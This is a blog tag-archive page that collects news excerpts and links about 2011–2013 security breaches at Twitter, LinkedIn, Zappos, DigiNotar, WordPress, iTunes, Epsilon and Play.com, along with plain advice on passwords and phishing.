Tag Archives: Hack

Twitter “attack was not the work of amateurs”

Bits from Bill
February 02, 2013
Updating your Twitter Password Isn’t Enough

Today, the public news report is that information from approximately 250,000 Twitter accounts was stolen. Twitter has taken action but I recommend you do more than just change your password. Even if you don’t use Twitter this attack may still affect you.

Continued reading: http://billpstudios.blogspot.com/2013/02/updating-your-twitter-password-isnt.html

LinkedIn Hack

ESET Threat Blog

Several people have notified us that they received emails today asking them to confirm their LinkedIn email addresses and we have determined that these are a scam. We are investigating the exact details but in the meantime please DO NOT CLICK on links in email to change or verify account information, at LinkedIn.com or on any other membership site. Instead, navigate to the site directly by typing in the address bar in your browser.

http://blog.eset.com/2012/06/06/linkedin-security-woes-and-what-to-do-about-it

Please don’t use the same password at every site, create passwords unique to each one and don’t make your password “password”.

Yes people do that…

http://techland.time.com/2011/11/22/the-25-most-popular-and-worst-passwords-of-2011/

http://certifiedbug.com/blog/2012/06/06/millions-of-linkedin-passwords-reportedly-leaked/

Millions of LinkedIn passwords reportedly leaked

Hot on the web it is being reported that 6.5 million encrypted LinkedIn passwords were dumped onto a Russian hacker forum.

“Sophos researchers have confirmed that the file does contain, at least in part, LinkedIn passwords.”
http://nakedsecurity.sophos.com/2012/06/06/millions-of-linkedin-passwords-reportedly-leaked-take-action-now/

More than 200,000 of these passwords have reportedly been cracked so far. The file only contains passwords hashed using the SHA-1 algorithm and does not include user names or any other data, security researchers say. However, the breach is so serious that security professionals are advising people to change their LinkedIn passwords immediately.

http://www.pcworld.com/article/257045/65m_linkedin_passwords_posted_online_after_apparent_hack.html

If you use this service change your LinkedIn password immediately, make it strong and use a different password at every site.

http://www.microsoft.com/security/online-privacy/passwords-create.aspx

Bad week for LinkedIn.

LinkedOut – A LinkedIn Privacy Issue

LinkedIn’s mobile application has an interesting feature that allows users to view their iOS calendars within the app. However, it turns out that LinkedIn have decided to send detailed calendar entries of users to their servers. The app doesn’t only send the participant lists of meetings; it also sends out the subject, location, time of meeting and more importantly personal meeting notes, which tend to contain highly sensitive information such as conference call details and passcodes. If you have decided to opt-in to this calendar feature in iPhone, LinkedIn will automatically receive your calendar entries and will continue doing so every-time you open your LinkedIn app.

http://blog.skycure.com/2012/06/linkedout-linkedin-privacy-issue.html

Update

An Update on LinkedIn Member Passwords Compromised
Vicente Silveira, June 6, 2012

We want to provide you with an update on this morning’s reports of stolen passwords. We can confirm that some of the passwords that were compromised correspond to LinkedIn accounts. We are continuing to investigate this situation and here is what we are pursuing as far as next steps for the compromised accounts: Members that have accounts associated with the compromised passwords will notice that their LinkedIn account password is no longer valid. These members will also receive an email from LinkedIn with instructions on how to reset their passwords. There will not be any links in this email. Once you follow this step and request password assistance, then you will receive an email from LinkedIn with a password reset link. These affected members will receive a second email from our Customer Support team providing a bit more context on this situation and why they are being asked to change their passwords.

It is worth noting that the affected members who update their passwords and members whose passwords have not been compromised benefit from the enhanced security we just recently put in place, which includes hashing and salting of our current password databases.

http://blog.linkedin.com/2012/06/06/linkedin-member-passwords-compromised/

Zappos hack exposes personal information

Beta News
By Ed Oswald

Data on up to 24 million customers of online shoe retailer Zappos was compromised according to an email sent by its CEO Tony Hsieh on Sunday. While Hsieh says that full credit card information is safe, hackers may have the last four digits of the cards.

Hackers accessed names, email addresses, physical addresses, and phone numbers. Passwords were also compromised, however in encrypted form. As a result, the company sent out an email to all its customers, advising them to change their passwords as a protective measure. Zappos is also asking customers to reset their passwords elsewhere where it may be the same.

http://betanews.com/2012/01/16/zappos-hack-exposes-personal-information-of-24-million-customers/

DigiNotar SSL Certificate Hack

Microsoft Security Advisory (2607712)
Fraudulent Digital Certificates Could Allow Spoofing
Published: August 29, 2011 | Updated: August 29, 2011

Microsoft is aware of at least one fraudulent digital certificate issued by DigiNotar, a certification authority present in the Trusted Root Certification Authorities Store, on all supported releases of Microsoft Windows. Although this is not a vulnerability in a Microsoft product, Microsoft is taking action to protect customers.

Microsoft has been able to confirm that one digital certificate affects all subdomains of google.com and may be used to spoof content, perform phishing attacks, or perform man-in-the-middle attacks against all Web browser users including users of Internet Explorer. Microsoft is continuing to investigate how many more certificates have been fraudulently issued. As a precautionary measure, Microsoft has removed the DigiNotar root certificate from the Microsoft Certificate Trust List.

All supported editions of Windows Vista, Windows 7, Windows Server 2008, and Windows Server 2008 R2 use the Microsoft Certificate Trust List to validate the trust of a certification authority. Users of these operating systems will be presented with an invalid certificate error when they browse to a Web site or try to install programs signed by the DigiNotar root certificate. In those cases users should follow the instructions in the message. Microsoft will release a future update to address this issue for all supported editions of Windows XP and Windows Server 2003.

Microsoft is continuing to investigate this issue and may release future updates to help protect customers.

http://www.microsoft.com/technet/security/advisory/2607712.mspx

Edit
V3.0 (September 6, 2011): Revised to announce the release of an update that addresses this issue.

Computerworld

Hackers may have obtained more than 200 digital certificates from a Dutch company after breaking into its network, including ones for Mozilla, Yahoo and the Tor project, a security researcher reported today.

The count is considerably higher than DigiNotar has acknowledged. Earlier this week, a company spokesman said that “several dozen” certificates had been acquired by the attackers.

http://www.computerworld.com/s/article/9219663/Hackers_may_have_stolen_over_200_SSL_certificates

Mac OS X can’t properly revoke dodgy digital certificates
http://www.computerworld.com/s/article/9219669/Mac_OS_X_can_t_properly_revoke_dodgy_digital_certificates

Firefox and Thunderbird 6.0.1 released after the Mozilla team removed DigiNotar from their root program to protect users.


WordPress warns of trojaned plugins

WordPress News
June 21, 2011

Earlier today the WordPress team noticed suspicious commits to several popular plugins (AddThis, WPtouch, and W3 Total Cache) containing cleverly disguised backdoors. We determined the commits were not from the authors, rolled them back, pushed updates to the plugins, and shut down access to the plugin repository while we looked for anything else unsavory.

We’re still investigating what happened, but as a prophylactic measure we’ve decided to force-reset all passwords on WordPress.org. To use the forums, trac, or commit to a plugin or theme, you’ll need to reset your password to a new one. (Same for bbPress.org and BuddyPress.org.)

http://wordpress.org/news/2011/06/passwords-reset/

iTunes hack

Betanews

iTunes hack goes global, new affected games identified

With Apple all but silent on the issue, it has been difficult to determine what may be the source of the problem. However, with the quantity of reports received now numbering over three dozen, a pattern has emerged: every game targeted is a free download, and the fraudulent charges are all due to in-app purchases.

For this reason, Betanews now has reason to believe that this particular hack affecting iTunes is likely sourced to an exploit existing in Apple’s in-app purchasing mechanism. It is the only similiarity between every report received.

http://www.betanews.com/article/iTunes-hack-goes-global-new-affected-games-identified/1307564070?

iTunes hack widespread, and Apple appears to know about it

From the reports a pattern is emerging. Nearly every victim had a gift card balance on their account, and some have reported that their credit card and/or payment information had been removed from their account. This indicates that Apple likely is aware of the attacks, and is actively trying to protect its users.

http://www.betanews.com/article/iTunes-hack-widespread-and-Apple-appears-to-know-about-it/1307390216

Epsilon Breach

No April Fools Day joke, on Friday Dallas based on-line marketing firm Epsilon said that its system had been breached.

Epsilon Notifies Clients of Unauthorized Entry into Email System
IRVING, TEXAS – April 1, 2011 – On March 30th, an incident was detected where a subset* of Epsilon clients’ customer data were exposed by an unauthorized entry into Epsilon’s email system. The information that was obtained was limited to email addresses and/or customer names only. A rigorous assessment determined that no other personal identifiable information associated with those names was at risk. A full investigation is currently underway.

* Updated April 4, 2011: The affected clients are approximately 2 percent of total clients and are a subset of clients for which Epsilon provides email services.

http://www.epsilon.com/News%20&%20Events/Press_Releases_2011/Epsilon_Notifies_Clients_of_Unauthorized_Entry_into_Email_System/p1057-l3

That 2 percent figure seems very low.

Mashable

A huge security breach has exposed the names and email addresses of customers of major brands, including Target, Best Buy, Walgreen’s, Capital One and more.

UPDATE: Apparently, a slew of hotel chains’ rewards programs have also been hit by the Epsilon breach; affected chains include Hilton, Red Roof Inn, Ritz-Carlton and Marriott.

List at Mashable: http://mashable.com/2011/04/04/epsilon-data-breach/

I received an email from a company I have done business with in the past in which they informed of a system breach at Epsilon and warning that e-mail addresses can be used for “phishing” attacks.

http://www.microsoft.com/security/online-privacy/phishing-symptoms.aspx

Play.com confirms breach

March 21, 2011 http://certifiedbug.com/blog/2011/03/21/play-com-customer-emails-leaked/

A message sent out to customers by Play.com:

Dear Customer,

Email Security Message

We are emailing all our customers to let you know that a company that handles part of our marketing communications has had a security breach. Unfortunately this has meant that some customer names and email addresses may have been compromised.

We take privacy and security very seriously and ensure all sensitive customer data is protected. Please be assured this issue has occurred outside of Play.com and no other personal customer information has been involved.

Please be assured we have taken every step to ensure this doesn’t happen again and accept our apologies for any inconvenience this may have caused some of you.

Customer Advice

Please do be vigilant with your email and personal information when using the internet. At Play.com we will never ask you for information such as passwords, bank account details or credit card numbers. If you receive anything suspicious in your email, please do not click on any links and forward the email on to privacy@play.com for us to investigate.

Thank you for continuing to shop at Play.com and we look forward to serving you in the future.

Play.com Customer Service Team

http://twitter.com/search?q=play.com%20spam

Do consider changing your Play.com password and the email account password associated with Play.com.

BBC News: Play.com warns of customer e-mail security breach
http://www.bbc.co.uk/news/technology-12819330

The retailer, which sells music, videos and games, blamed another company that it employs to do marketing.